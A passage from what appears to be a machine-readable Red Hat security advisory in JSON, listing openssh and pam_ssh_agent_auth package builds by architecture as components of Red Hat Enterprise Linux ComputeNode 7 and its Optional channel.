Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.src as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.src", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": 